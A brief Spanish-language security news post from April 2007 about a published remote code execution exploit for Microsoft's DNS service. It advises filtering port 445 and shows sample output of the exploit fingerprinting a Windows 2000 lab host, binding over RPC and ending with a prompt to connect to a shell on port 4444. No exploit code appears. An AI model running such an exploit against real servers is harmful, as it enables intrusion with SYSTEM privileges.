18/04/07
Se ha publicado un nuevo exploit para la vulnerabilidad remota del servicio de DNS de Microsoft que permitiria a un usuario la ejecucion remota de codigo con privilegios de SYSTEM.
Al contrario que los reportes iniciales de Microsoft, se ha notificado de que el exploit es capaz de atacar un sistema a través del puerto 445 por lo que dicho puerto debe ser filtrado en el firewall hasta que el parche definitivo sea publicado.
Debido a la presencia cada vez mayor de exploits de esta vulnerabilidad, se ha actualizado el codigo del mismo con muchas novedades (tanto para Windows 2000 como 2003)
A continuación se muestra un ejemplo del uso del exploit contra un sistema windows 2000 server:
[+] Trying to fingerprint target.. (05.00)
[+] Remote Host identified as Windows 2000
[-] No port selected. Trying Ninja sk1llz
[+] Binding to ncacn_ip_tcp:192.168.1.7
[+] Found 50abc2a4-574d-40b3-9d66-ee4fd5fba076 version 5.0
[+] RPC binding string: ncacn_ip_tcp:192.168.1.7[1028]
[+] Dynamic DNS rpc port found (1028)
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_ip_tcp:192.168.1.7[1028]
[+] RpcBindingFromStringBinding success
[+] Selected target 0x79467ef8
[+] Sending Exploit code to DnssrvOperation()
[+] Now try to connect to port 4444